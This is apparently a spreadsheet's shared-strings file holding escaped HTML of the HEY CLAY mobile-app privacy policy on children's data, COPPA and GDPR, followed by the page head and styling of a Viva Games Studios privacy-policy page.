    <t>COPPA also requires that we obtain the consent of parents or legal guardians before we allow children under the age of 13 to use certain features of our Apps.&lt;!--]--&gt;&lt;/p&gt;&lt;p&gt;&lt;!--[--&gt;The General Data Protection Regulation (GDPR) requires us to inform parents or legal guardians about how we collect, use, and disclose personal information from children under the age of 16. The GDPR also requires that we obtain the consent of parents or legal guardians before we allow children to use certain features of our Apps.&lt;!--]--&gt;&lt;/p&gt;&lt;p&gt;&lt;!--[--&gt;We do not knowingly collect and store personal data directly from: (i) US resident children under 13 years of age without parental consent, except as permitted under COPPA; (ii) EU resident children under 16 years of age without parental consent, except as permitted under EU applicable law. We do not use our Apps or Services to knowingly solicit any data or information from such users.&lt;!--]--&gt;&lt;/p&gt;&lt;p&gt;&lt;!--[--&gt;If we believe that we have collected and stored personal data from a child (without the necessary parental consent or another legal basis to do so), we will delete the personal data provided as soon as feasibly possible.</t>
  </si>
  <si>
    <t>If you are aware that your child has provided us with personal data not in accordance with the terms of this Privacy Policy, please contact us at &lt;a href="/cdn-cgi/l/email-protection#ea8985849e8b899eaa828f93c789868b93c4898587" rel="noopener noreferrer"&gt;&lt;!--[--&gt;&lt;span class="__cf_email__" data-cfemail="ec8f8382988d8f98ac848995c18f808d95c28f8381"&gt;[email&amp;#160;protected]&lt;/span&gt;&lt;!--]--&gt;&lt;/a&gt;.&lt;!--]--&gt;&lt;/p&gt;&lt;p&gt;&lt;!--[--&gt;&lt;strong&gt;&lt;!--[--&gt;In any event, we do not condition a child’s usage of or access to any online activity or Apps on the child providing any personal data.&lt;!--]--&gt;&lt;/strong&gt;&lt;!--]--&gt;&lt;/p&gt;&lt;p&gt;&lt;!--[--&gt;This Privacy Policy is provided in a layered format so you can click through to the specific areas set out below.&lt;!--]--&gt;&lt;/p&gt;&lt;p&gt;&lt;!--[--&gt;Alternatively, you can download a pdf version of the Privacy Policy here: &lt;a href="https://www.google.com/" rel="nofollow" target="_blank"&gt;&lt;!--[--&gt;HEY CLAY Mobile Application Privacy Policy&lt;!--]--&gt;&lt;/a&gt;&lt;!--]--&gt;&lt;/p&gt;&lt;ul&gt;&lt;!--[--&gt;&lt;li&gt;&lt;!--[--&gt;&lt;a aria-current="page" href="/privacy-policy#important-information-and-who-we-are" class="router-link-active router-link-exact-active"&gt;&lt;!--[--&gt;&lt;strong&gt;&lt;!--[--&gt;IMPORTANT INFORMATION AND WHO WE ARE&lt;!--]--&gt;&lt;/strong&gt;&lt;!--]--&gt;&lt;/a&gt;&lt;!--]--&gt;&lt;/li&gt;&lt;li&gt;&lt;!--[--&gt;&lt;a aria-current="page" href="/privacy-policy#the-data-we-collect-about-you" class="router-link-active router-link-exact-active"&gt;&lt;!--[--&gt;&lt;strong&gt;&lt;!--[--&gt;THE DATA WE COLLECT ABOUT YOU&lt;!--]--&gt;&lt;/strong&gt;&lt;!--]--&gt;&lt;/a&gt;&lt;!--]--&gt;&lt;/li&gt;&lt;li&gt;&lt;!--[--&gt;&lt;a aria-current="page" href="/privacy-policy#how-is-your-personal-data-collected" class="router-link-active router-link-exact-active"&gt;&lt;!--[--&gt;&lt;strong&gt;&lt;!--[--&gt;HOW IS YOUR PERSONAL DATA COLLECTED?&lt;!--]--&gt;&lt;/strong&gt;&lt;!--]--&gt;&lt;/a&gt;&lt;!--]--&gt;&lt;/li&gt;&lt;li&gt;&lt;!--[--&gt;&lt;a aria-current="page" href="/privacy-policy#how-we-use-your-personal-data" class="router-link-active router-link-exact-active"&gt;&lt;!--[--&gt;&lt;strong&gt;&lt;!--[--&gt;HOW WE USE YOUR PERSONAL DATA&lt;!--]--&gt;&lt;/strong&gt;&lt;!--]--&gt;&lt;/a&gt;&lt;!--]--&gt;&lt;/li&gt;&lt;li&gt;&lt;!--[--&gt;&lt;a aria-current="page" href="/privacy-policy#disclosures-of-your-personal-data" class="router-link-active router-link-exact-active"&gt;&lt;!--[--&gt;&lt;strong&gt;&lt;!--[--&gt;DISCLOSURES OF YOUR PERSONAL DATA&lt;!--]--&gt;&lt;/strong&gt;&lt;!--]--&gt;&lt;/a&gt;&lt;!--]--&gt;&lt;/li&gt;&lt;li&gt;&lt;!--[--&gt;&lt;a aria-current="page" href="/privacy-policy#international-transfers" class="router-link-active router-link-exact-active"&gt;&lt;!--[--&gt;&lt;strong&gt;&lt;!--[--&gt;INTERNATIONAL</t>
  </si>
  <si>
    <t>TRANSFERS&lt;!--]--&gt;&lt;/strong&gt;&lt;!--]--&gt;&lt;/a&gt;&lt;!--]--&gt;&lt;/li&gt;&lt;li&gt;&lt;!--[--&gt;&lt;a aria-current="page" href="/privacy-policy#data-retention" class="router-link-active router-link-exact-active"&gt;&lt;!--[--&gt;&lt;strong&gt;&lt;!--[--&gt;DATA RETENTION&lt;!--]--&gt;&lt;/strong&gt;&lt;!--]--&gt;&lt;/a&gt;&lt;!--]--&gt;&lt;/li&gt;&lt;li&gt;&lt;!--[--&gt;&lt;a aria-current="page" href="/privacy-policy#your-legal-rights" class="router-link-active router-link-exact-active"&gt;&lt;!--[--&gt;&lt;strong&gt;&lt;!--[--&gt;YOUR LEGAL RIGHTS&lt;!--]--&gt;&lt;/strong&gt;&lt;!--]--&gt;&lt;/a&gt;&lt;!--]--&gt;&lt;/li&gt;&lt;!--]--&gt;&lt;/ul&gt;&lt;h2 id="important-information-and-who-we-are"&gt;&lt;a href="#important-information-and-who-we-are"&gt;&lt;!--[--&gt;IMPORTANT INFORMATION AND WHO WE ARE&lt;!--]--&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;&lt;!--[--&gt;HEY CLAY LLC is the controller and is responsible for your personal data (collectively referred to as “Company”, “we”, “us”, or “our” in this Privacy Policy).&lt;!--]--&gt;&lt;/p&gt;&lt;p&gt;&lt;!--[--&gt;If you have any questions about this Privacy Policy, please contact us using the details set out below.&lt;!--]--&gt;&lt;/p&gt;&lt;h4 id="contact-details"&gt;&lt;a href="#contact-details"&gt;&lt;!--[--&gt;Contact Details&lt;!--]--&gt;&lt;/a&gt;&lt;/h4&gt;&lt;p&gt;&lt;!--[--&gt;Our full details are:&lt;!--]--&gt;&lt;/p&gt;&lt;ul&gt;&lt;!--[--&gt;&lt;li&gt;&lt;!--[--&gt;Full name of legal entity: HEY CLAY, LLC&lt;!--]--&gt;&lt;/li&gt;&lt;li&gt;&lt;!--[--&gt;Email address: &lt;a href="/cdn-cgi/l/email-protection#54373b3a20353720143c312d793738352d7a373b39" rel="noopener noreferrer"&gt;&lt;!--[--&gt;&lt;span class="__cf_email__" data-cfemail="781b17160c191b0c38101d01551b141901561b1715"&gt;[email&amp;#160;protected]&lt;/span&gt;&lt;!--]--&gt;&lt;/a&gt;&lt;!--]--&gt;&lt;/li&gt;&lt;li&gt;&lt;!--[--&gt;Postal address: 215 Creel Chase NW, Kennesaw GA 30144 USA&lt;!--]--&gt;&lt;/li&gt;&lt;!--]--&gt;&lt;/ul&gt;&lt;p&gt;&lt;!--[--&gt;You have the right to make a complaint at any time to a competent supervisory authority of an EU member state the list of which you can find at the following link &lt;a href="https://ec.europa.eu/justice/article-29/structure/data-protection-authorities/index_en.htm" rel="nofollow"&gt;&lt;!--[--&gt;https://ec.europa.eu/justice/article-29/structure/data-protection-authorities/index_en.htm&lt;!--]--&gt;&lt;/a&gt;.&lt;!--]--&gt;&lt;/p&gt;&lt;h4 id="changes-to-the-privacy-policy-and-our-mutual-duty-to-inform-about-changes"&gt;&lt;a href="#changes-to-the-privacy-policy-and-our-mutual-duty-to-inform-about-changes"&gt;&lt;!--[--&gt;Changes to the Privacy Policy and our mutual duty to inform about changes&lt;!--]--&gt;&lt;/a&gt;&lt;/h4&gt;&lt;p&gt;&lt;!--[--&gt;We keep our Privacy Policy under regular review.&lt;!--]--&gt;&lt;/p&gt;&lt;p&gt;&lt;!--[--&gt;This version was last updated on 12/10/2021. It may change and if it does, these changes will be posted on this page and, where appropriate, notified to you when you next start the App. The new Privacy Policy may be displayed on-screen and you may be required to read and accept the changes to continue your use of the App or the Services.&lt;!--]--&gt;&lt;/p&gt;&lt;p&gt;&lt;!--[--&gt;It is important that the personal data we hold about you is accurate and current.</t>
  </si>
  <si>
    <t>Please keep us informed if your personal data changes during our relationship with you.&lt;!--]--&gt;&lt;/p&gt;&lt;h4 id="third-party-links"&gt;&lt;a href="#third-party-links"&gt;&lt;!--[--&gt;Third-party links&lt;!--]--&gt;&lt;/a&gt;&lt;/h4&gt;&lt;p&gt;&lt;!--[--&gt;Our Apps don’t contain any third-party advertising banners, but they may contain information about our other Apps, Services, or goods with links to those Apps (either to Google Play, App Store, or Amazon).&lt;!--]--&gt;&lt;/p&gt;&lt;p&gt;&lt;!--[--&gt;Our Apps may contain external links to our pages on the App Store, Google Play, Facebook, Instagram, YouTube channel, Twitter, or Amazon. All external links such as our website, social media, and support e-mail are secured behind a parental gate (for example, the App requires to swipe two fingers in a specified direction).&lt;!--]--&gt;&lt;/p&gt;&lt;h2 id="the-data-we-collect-about-you"&gt;&lt;a href="#the-data-we-collect-about-you"&gt;&lt;!--[--&gt;THE DATA WE COLLECT ABOUT YOU&lt;!--]--&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;&lt;!--[--&gt;We understand the importance of our users’ personal data, and more importantly, the information pertaining to children under 16 (for the purpose of GDPR) and 13 (for the purpose of COPPA) years of age.&lt;!--]--&gt;&lt;/p&gt;&lt;p&gt;&lt;!--[--&gt;&lt;strong&gt;&lt;!--[--&gt;We do not collect or require users to enter their personal information when they use our Apps.</t>
  </si>
  <si>
    <t>We do not collect any personal data from children with our Services.&lt;!--]--&gt;&lt;/strong&gt;&lt;!--]--&gt;&lt;/p&gt;&lt;p&gt;&lt;!--[--&gt;Our Apps do not use or collect a user’s precise geographic location.&lt;!--]--&gt;&lt;/p&gt;&lt;p&gt;&lt;!--[--&gt;However, there are cases when we may collect some of your personal data, and only if such cases arise, we collect it. This Privacy Policy describes all cases when we may collect your personal data and, consequently, which data we collect in such cases and how we process it. Notwithstanding anything to the contrary herein we do not collect any personal data just by the fact that this Privacy Policy describes the cases when personal data may be collected or by the fact of using our App.&lt;!--]--&gt;&lt;/p&gt;&lt;p&gt;&lt;!--[--&gt;For example, we do not collect any personal data mentioned below under &amp;quot;User Account Registration&amp;quot;, if the relevant app function is not available to the user or is not used by the user.&lt;!--]--&gt;&lt;/p&gt;&lt;p&gt;&lt;!--[--&gt;We may offer you paid services or features within our Apps.</t>
  </si>
  <si>
    <t>In all such cases, if they are available, you make payments for our offers via services and features provided and supported by Apple and Google. They directly process and collect your payment data according to your agreement with them with respect to your usage of their respective services and features. We do not collect any of your payment data and do not authorize or instruct Apple or Google to collect and store such data on our behalf or in our favour.&lt;!--]--&gt;&lt;/p&gt;&lt;p&gt;&lt;!--[--&gt;In some cases, our Apps provide you with the ability to indicate some personal data of your child like name or full name and age or make a photo.</t>
  </si>
  <si>
    <t>In each such case, we do not collect and store such data. This information is recorded only on your devices where our Apps have been installed. This data will be irrevocably deleted upon uninstallation or deleting our Apps from your device.&lt;!--]--&gt;&lt;/p&gt;&lt;h4 id="user-account-registration"&gt;&lt;a href="#user-account-registration"&gt;&lt;!--[--&gt;User Account Registration&lt;!--]--&gt;&lt;/a&gt;&lt;/h4&gt;&lt;p&gt;&lt;!--[--&gt;Generally, we do not require users to create an account to be able to use our Apps and Services and, consequently, we do not collect any of your personal data in such cases.&lt;!--]--&gt;&lt;/p&gt;&lt;p&gt;&lt;!--[--&gt;However, sometimes user account registration helps users to use our Apps.</t>
  </si>
  <si>
    <t>All functions and features of our App that require the creation of user accounts, if they are available, are intended for users of at least 18 years old or younger provided that they have reached the appropriate age that allows: (a) to consent to the processing of personal data in their country without prior approval of their parents or legal guardians; and (b) to enter independently into contracts in their own country without prior approval of their parents or legal guardians.&lt;!--]--&gt;&lt;/p&gt;&lt;p&gt;&lt;!--[--&gt;By creating an account and using the Services and our Apps as a registered user, if such functions are available in your country, you confirm that you have reached the appropriate foregoing age requirements. If you do not comply with such age requirements, do not create an account and do not directly use our Services that require account registration.&lt;!--]--&gt;&lt;/p&gt;&lt;p&gt;&lt;!--[--&gt;If you are not sure about whether you can independently consent to the processing of personal data, please contact your authorized personal data protection authority in your country.&lt;!--]--&gt;&lt;/p&gt;&lt;p&gt;&lt;!--[--&gt;We may ask you to submit additional documents or to pass through additional procedures to make sure that you are already 13 years old (or more, as required by the laws of your country), if we have reasonable doubts about your age. We may also contact your parents or legal guardians to obtain consent or approval of the processing of your personal data if you have not reached the appropriate age.</t>
  </si>
  <si>
    <t>For a period of clarification or getting approval from your parents or legal guardians, we may restrict the processing of data on you and temporarily block your account.&lt;!--]--&gt;&lt;/p&gt;&lt;p&gt;&lt;!--[--&gt;If you create an account, we collect and store from you or from third parties the following information:&lt;!--]--&gt;&lt;/p&gt;&lt;ul&gt;&lt;!--[--&gt;&lt;li&gt;&lt;!--[--&gt;&lt;strong&gt;&lt;!--[--&gt;Identity Data&lt;!--]--&gt;&lt;/strong&gt;: first name, last name, username, or other identifier(s).&lt;!--]--&gt;&lt;/li&gt;&lt;li&gt;&lt;!--[--&gt;&lt;strong&gt;&lt;!--[--&gt;Contact Data&lt;!--]--&gt;&lt;/strong&gt;: email address only.&lt;!--]--&gt;&lt;/li&gt;&lt;li&gt;&lt;!--[--&gt;&lt;strong&gt;&lt;!--[--&gt;Device Data&lt;!--]--&gt;&lt;/strong&gt;: includes your mobile operating system.&lt;!--]--&gt;&lt;/li&gt;&lt;li&gt;&lt;!--[--&gt;&lt;strong&gt;&lt;!--[--&gt;Profile Data&lt;!--]--&gt;&lt;/strong&gt;: includes details of your use of any of our Apps, namely features and functions available to or activated by you to provide you our Service and your ability to use our Apps.&lt;!--]--&gt;&lt;/li&gt;&lt;!--]--&gt;&lt;/ul&gt;&lt;h2 id="how-is-your-personal-data-collected"&gt;&lt;a href="#how-is-your-personal-data-collected"&gt;&lt;!--[--&gt;HOW IS YOUR PERSONAL DATA</t>
  </si>
  <si>
    <t>COLLECTED?&lt;!--]--&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;&lt;!--[--&gt;If we offer a function to register an account and you use it, we will collect and process the following data about you:&lt;!--]--&gt;&lt;/p&gt;&lt;ul&gt;&lt;!--[--&gt;&lt;li&gt;&lt;!--[--&gt;&lt;strong&gt;&lt;!--[--&gt;Information you give us.&lt;!--]--&gt;&lt;/strong&gt; This is information (including your Identity and Contact Data) that you provide us about you by filling in forms on the App, or by corresponding with us (for example, by email or chat), or via third parties. It includes information you provide when you register or create an account in our Apps, subscribe to any of our Services, make an in-App purchase, and when you report a problem with an App or our Services.&lt;!--]--&gt;&lt;/li&gt;&lt;!--]--&gt;&lt;/ul&gt;&lt;p&gt;&lt;!--[--&gt;If you contact us, we will keep a record of that correspondence regardless of whether you have registered the account or not.&lt;!--]--&gt;&lt;/p&gt;&lt;ul&gt;&lt;!--[--&gt;&lt;li&gt;&lt;!--[--&gt;&lt;strong&gt;&lt;!--[--&gt;Information we collect about you and your device.&lt;!--]--&gt;&lt;/strong&gt;</t>
  </si>
  <si>
    <t>Each time you use one of our Apps we will automatically collect personal data including Device and Profile Data.&lt;!--]--&gt;&lt;/li&gt;&lt;li&gt;&lt;!--[--&gt;&lt;strong&gt;&lt;!--[--&gt;Location Data.&lt;!--]--&gt;&lt;/strong&gt; We do not collect your Location Data regardless of you have or not a registered account.&lt;!--]--&gt;&lt;/li&gt;&lt;li&gt;&lt;!--[--&gt;&lt;strong&gt;&lt;!--[--&gt;Information we receive from other sources including third parties and publicly available sources.&lt;!--]--&gt;&lt;/strong&gt;</t>
  </si>
  <si>
    <t>We will receive personal data about you from some third parties as set out below:&lt;!--]--&gt;&lt;/li&gt;&lt;li&gt;&lt;!--[--&gt;&lt;strong&gt;&lt;!--[--&gt;Identity and Contact Data from Google and Apple.&lt;!--]--&gt;&lt;/strong&gt; If you choose to create an account or log into an account via a third party such as Facebook or Google, we collect and store personal data and other information made available by that third party, such as your first name, last name, e-mail, and your username or other identifier(s). We may also collect technical information to ensure that our Apps connect correctly.</t>
  </si>
  <si>
    <t>The third parties are responsible for obtaining your consent before sharing such data with us.&lt;!--]--&gt;&lt;/li&gt;&lt;!--]--&gt;&lt;/ul&gt;&lt;h4 id="information-collected-through-or-used-by-our-apps"&gt;&lt;a href="#information-collected-through-or-used-by-our-apps"&gt;&lt;!--[--&gt;Information collected through or used by our Apps&lt;!--]--&gt;&lt;/a&gt;&lt;/h4&gt;&lt;p&gt;&lt;!--[--&gt;&lt;em&gt;&lt;!--[--&gt;&lt;strong&gt;&lt;!--[--&gt;Information used automatically by our Apps&lt;!--]--&gt;&lt;/strong&gt;&lt;!--]--&gt;&lt;/em&gt;&lt;!--]--&gt;&lt;/p&gt;&lt;p&gt;&lt;!--[--&gt;Most of our Apps notes Device Preferences and uses this data to determine your country, language preferences, and mobile operating system. Generally, this information is not collected and stored by us, but our Apps need this information to initialize the Apps’ functions. This information cannot be connected to a unique device or user or other identifier and is never shared with third parties.&lt;!--]--&gt;&lt;/p&gt;&lt;p&gt;&lt;!--[--&gt;When you use our Apps as a registered user, if it is available for you, our Apps also collect your Identity Data to provide you with all functions, features, and Services that you have previously activated, bought, or that are available for you.&lt;!--]--&gt;&lt;/p&gt;&lt;p&gt;&lt;!--[--&gt;&lt;em&gt;&lt;!--[--&gt;&lt;strong&gt;&lt;!--[--&gt;Information you provide through Apps&lt;!--]--&gt;&lt;/strong&gt;&lt;!--]--&gt;&lt;/em&gt;&lt;!--]--&gt;&lt;/p&gt;&lt;p&gt;&lt;!--[--&gt;Child users and unregistered users do not have the ability to provide any personal data when using the Apps beyond what has been collected or used automatically (as noted above) and we do not collect or process any personal data of such users.&lt;!--]--&gt;&lt;/p&gt;&lt;p&gt;&lt;!--[--&gt;When you save a photo or tag such a photo by your or your child’s name and/or age via our Apps, where available, such information is recorded and stored on your devices and will be available for you upon the next usage of our Apps.</t>
  </si>
  <si>
    <t>We do not collect, store, use or process such information in any manner or way and for any purpose. In each of such cases, we only provide our Apps for your ability to take and tag photos. You are able to independently determine how this data will be used and processed.</t>
  </si>
  <si>
    <t>This data will be deleted from your device automatically upon Apps uninstallation or deleting. At your sole discretion, you may delete this data from your device at any time.&lt;!--]--&gt;&lt;/p&gt;&lt;h4 id="we-do-not-collect-any-other-information"&gt;&lt;a href="#we-do-not-collect-any-other-information"&gt;&lt;!--[--&gt;We do not collect any other information&lt;!--]--&gt;&lt;/a&gt;&lt;/h4&gt;&lt;p&gt;&lt;!--[--&gt;When you download and use our Apps or Services, we do not require you to provide any information or data about you or your device, except for non-personal information that is necessary for the initialization and function of our Apps.&lt;!--]--&gt;&lt;/p&gt;&lt;p&gt;&lt;!--[--&gt;We don’t collect any other personal data, except as explained above. We do not share such information with third parties.&lt;!--]--&gt;&lt;/p&gt;&lt;p&gt;&lt;!--[--&gt;We do not collect any Special Categories of Personal Data about you (this includes details about your race or ethnicity, religious or philosophical beliefs, sex life, sexual orientation, political opinions, trade union membership, information about your health, genetic and biometric data).</t>
  </si>
  <si>
    <t>Nor do we collect any information about criminal convictions and offences.&lt;!--]--&gt;&lt;/p&gt;&lt;h2 id="how-we-use-your-personal-data"&gt;&lt;a href="#how-we-use-your-personal-data"&gt;&lt;!--[--&gt;HOW WE USE YOUR PERSONAL DATA&lt;!--]--&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;&lt;!--[--&gt;We will only use your personal data, if we collect it as described above and when the law allows us to do so. Most commonly we will use your personal data in the following circumstances:&lt;!--]--&gt;&lt;/p&gt;&lt;ul&gt;&lt;!--[--&gt;&lt;li&gt;&lt;!--[--&gt;(a) Where we need to perform a contract we are about to enter or have entered with you.&lt;!--]--&gt;&lt;/li&gt;&lt;!--]--&gt;&lt;/ul&gt;&lt;p&gt;&lt;!--[--&gt;By registering an account and using our Apps or Services, you and Company conclude a contract for the provision of services or granting a license, or you and Company may conclude additional agreements when you buy any features of functionality offered by the Company within Apps.</t>
  </si>
  <si>
    <t>In order to provide you with services under such contracts, we must collect and process certain data about you. For example, when you buy some features in our Apps you expect to use such purchases within Apps on any device. We should collect information about you as a user because without it we will not be able to provide you with such features across multiple devices.&lt;!--]--&gt;&lt;/p&gt;&lt;ul&gt;&lt;!--[--&gt;&lt;li&gt;&lt;!--[--&gt;(b) Where it is necessary for our legitimate interests (or those of a third party) and your interests and fundamental rights do not override those interests.&lt;!--]--&gt;&lt;/li&gt;&lt;!--]--&gt;&lt;/ul&gt;&lt;p&gt;&lt;!--[--&gt;Legitimate interests mean the interest of our business in conducting and managing our business to enable us to give you the best service/product and the best and most secure experience.</t>
  </si>
  <si>
    <t>We make sure we consider and balance any potential impact on you (both positive and negative) and your rights before we process your personal data for our legitimate interests. We do not use your personal data for activities where our interests are overridden by the impact on you (unless we have your consent or are otherwise required or permitted to by law). You can obtain further information about how we assess our legitimate interests against any potential impact on you in respect of specific activities by contacting us.&lt;!--]--&gt;&lt;/p&gt;&lt;ul&gt;&lt;!--[--&gt;&lt;li&gt;&lt;!--[--&gt;(c) Where we need to comply with a legal or regulatory obligation.&lt;!--]--&gt;&lt;/li&gt;&lt;!--]--&gt;&lt;/ul&gt;&lt;p&gt;&lt;!--[--&gt;We may process a user’s data if it is required by the law that applies to us.</t>
  </si>
  <si>
    <t>For example, we may provide data on users at the request of courts or other authorized bodies or when collection and identification are required by the legislation on financial monitoring and prevention of money laundering or by other applicable laws.&lt;!--]--&gt;&lt;/p&gt;&lt;ul&gt;&lt;!--[--&gt;&lt;li&gt;&lt;!--[--&gt;(d) Where you have consented before the processing.&lt;!--]--&gt;&lt;/li&gt;&lt;!--]--&gt;&lt;/ul&gt;&lt;p&gt;&lt;!--[--&gt;We rely solely upon the user&amp;#39;s consent when using personal user data for the purpose of displaying targeted advertising, marketing, and promotional mailing, or for other purposes for which a specific user’s consent must be granted.&lt;!--]--&gt;&lt;/p&gt;&lt;h2 id="disclosures-of-your-personal-data"&gt;&lt;a href="#disclosures-of-your-personal-data"&gt;&lt;!--[--&gt;DISCLOSURES OF YOUR PERSONAL DATA&lt;!--]--&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;&lt;!--[--&gt;Any personal data collected by us is used solely to provide you with the Service or your ability to use our Apps, to improve our Apps and service and we do not provide this information to any third party (beyond those disclosed above), unless in order to comply with a legal obligation to do so (e.g. court order) or in case the ownership of the information changes due to a merger, acquisition or restructuring involving the Company.&lt;!--]--&gt;&lt;/p&gt;&lt;h2 id="international-transfers"&gt;&lt;a href="#international-transfers"&gt;&lt;!--[--&gt;INTERNATIONAL TRANSFERS&lt;!--]--&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;&lt;!--[--&gt;We do not transfer your personal data outside the European Economic Area (&lt;strong&gt;&lt;!--[--&gt;EEA&lt;!--]--&gt;&lt;/strong&gt;).&lt;!--]--&gt;&lt;/p&gt;&lt;h2 id="data-retention"&gt;&lt;a href="#data-retention"&gt;&lt;!--[--&gt;DATA RETENTION&lt;!--]--&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;&lt;!--[--&gt;We must keep basic information about you (including Contact, Identity, Profile) for the time necessary to provide the requested services and 3+ years after. The purpose of your personal data retention shall be to fulfil a contract with you according to GDPR Art.</t>
  </si>
  <si>
    <t>6 (1) (b) and duly provide the requested services.&lt;!--]--&gt;&lt;/p&gt;&lt;p&gt;&lt;!--[--&gt;In some circumstances you can ask us to delete your data : see &lt;em&gt;&lt;!--[--&gt;Your legal Rights&lt;!--]--&gt;&lt;/em&gt; below for further information.&lt;!--]--&gt;&lt;/p&gt;&lt;p&gt;&lt;!--[--</t>
  </si>
  <si>
    <t>&lt;!doctype html&gt;_x005F_x000D_
		&lt;html lang="es"&gt;_x005F_x000D_
		_ x000D_
	&lt;head&gt;_x005F_x000D_
_x005F_x000D_
				&lt;meta charset="UTF-8"&gt;_x005F_x000D_
		&lt;meta name="viewport" content="width=device-width, initial-scale=1"&gt;_x005F_x000D_
		&lt;link rel="profile" href="http://gmpg.org/xfn/11"&gt;_x005F_x000D_
		_ x000D_
		&lt;meta name='robots' content='index, follow, max-image-preview:large, max-snippet:-1, max-video-preview:-1' /&gt;
	&lt;!--</t>
  </si>
  <si>
    <t>This site is optimized with the Yoast SEO plugin v20.4 - https://yoast.com/wordpress/plugins/seo/ --&gt;
	&lt;title&gt;Privacy Policy - Viva Games Studios&lt;/title&gt;
	&lt;link rel="canonical" href="https://www.vivastudios.com/privacy-policy/" /&gt;
	&lt;meta property="og:locale" content="es_ES" /&gt;
	&lt;meta property="og:type" content="article" /&gt;
	&lt;meta property="og:title" content="Privacy Policy - Viva Games Studios" /&gt;
	&lt;meta property="og:description" content="Privacy Policy Updated: February 24th 2022 Thanks for playing with us! This document details what personal information we collect, how we do it and for what purposes.</t>
  </si>
  <si>
    <t>We explain how you can exercise your rights and choose your options. We also establish the Contract Conditions which will govern the relationship between you and VIVA GAMES [&amp;hellip;]" /&gt;
	&lt;meta property="og:url" content="https://www.vivastudios.com/privacy-policy/" /&gt;
	&lt;meta property="og:site_name" content="Viva Games Studios" /&gt;
	&lt;meta property="article:modified_time" content="2023-02-13T14:37:51+00:00" /&gt;
	&lt;meta name="twitter:card" content="summary_large_image" /&gt;
	&lt;meta name="twitter:label1" content="Tiempo de lectura" /&gt;
	&lt;meta name="twitter:data1" content="31 minutos" /&gt;
	&lt;script type="application/ld+json" class="yoast-schema-graph"&gt;{"@context":"https://schema.org","@graph":[{"@type":"WebPage","@id":"https://www.vivastudios.com/privacy-policy/","url":"https://www.vivastudios.com/privacy-policy/","name":"Privacy Policy - Viva Games Studios","isPartOf":{"@id":"https://www.vivastudios.com/#website"},"datePublished":"2022-02-11T09:22:21+00:00","dateModified":"2023-02-13T14:37:51+00:00","breadcrumb":{"@id":"https://www.vivastudios.com/privacy-policy/#breadcrumb"},"inLanguage":"es","potentialAction":[{"@type":"ReadAction","target":["https://www.vivastudios.com/privacy-policy/"]}]},{"@type":"BreadcrumbList","@id":"https://www.vivastudios.com/privacy-policy/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Portada","item":"https://www.vivastudios.com/"},{"@type":"ListItem","position":2,"name":"Privacy Policy"}]},{"@type":"WebSite","@id":"https://www.vivastudios.com/#website","url":"https://www.vivastudios.com/","name":"Viva</t>
  </si>
  <si>
    <t>Games Studios","description":"Grow your game to its maximum potential","publisher":{"@id":"https://www.vivastudios.com/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https://www.vivastudios.com/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"es"},{"@type":"Organization","@id":"https://www.vivastudios.com/#organization","name":"VIVA Games Studios","url":"https://www.vivastudios.com/","logo":{"@type":"ImageObject","inLanguage":"es","@id":"https://www.vivastudios.com/#/schema/logo/image/","url":"http://www.devvivastudios.com/wp-content/uploads/2021/05/logo-white.png","contentUrl":"http://www.devvivastudios.com/wp-content/uploads/2021/05/logo-white.png","width":167,"height":70,"caption":"VIVA Games Studios"},"image":{"@id":"https://www.vivastudios.com/#/schema/logo/image/"},"sameAs":["https://es.linkedin.com/company/viva-games-studios"]}]}&lt;/script&gt;
	&lt;!-- / Yoast SEO plugin. --&gt;
&lt;link rel='dns-prefetch' href='//www.google.com' /&gt;
&lt;link rel='dns-prefetch' href='//fonts.googleapis.com' /&gt;
&lt;link rel='dns-prefetch' href='//pagead2.googlesyndication.com' /&gt;
&lt;link rel="alternate" type="application/rss+xml" title="Viva Games Studios &amp;raquo; Feed" href="https://www.vivastudios.com/feed/" /&gt;
&lt;link rel="alternate" type="application/rss+xml" title="Viva Games Studios &amp;raquo; Feed de los comentarios" href="https://www.vivastudios.com/comments/feed/" /&gt;
&lt;script type="text/javascript"&gt;
window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/www.vivastudios.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.2"}};
/*!</t>
  </si>
  <si>
    <t xml:space="preserve">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id='wp-block-library-css' href='http://www.vivastudios.com/wp-includes/css/dist/block-library/style.min.css?ver=6.2' type='text/css' media='all' /&gt;
&lt;style id='wp-block-library-theme-inline-css' type='text/css'&gt;
</t>
  </si>
  <si>
    <t>.wp-block-audio figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-audio figcaption{color:hsla(0,0%,100%,.65)}.wp-block-audio{margin:0 0 1em}.wp-block-code{border:1px solid #ccc;border-radius:4px;font-family:Menlo,Consolas,monaco,monospace;padding:.8em 1em}.wp-block-embed figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-embed figcaption{color:hsla(0,0%,100%,.65)}.wp-block-embed{margin:0 0 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:hsla(0,0%,100%,.65)}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{color:hsla(0,0%,100%,.65)}.wp-block-image{margin:0 0 1em}.wp-block-pullquote{border-bottom:4px solid;border-top:4px solid;color:currentColor;margin-bottom:1.75em}.wp-block-pullquote cite,.wp-block-pullquote footer,.wp-block-pullquote__citation{color:currentColor;font-size:.8125em;font-style:normal;text-transform:uppercase}.wp-block-quote{border-left:.25em solid;margin:0 0 1.75em;padding-left:1em}.wp-block-quote cite,.wp-block-quote footer{color:currentColor;font-size:.8125em;font-style:normal;position:relative}.wp-block-quote.has-text-align-right{border-left:none;border-right:.25em 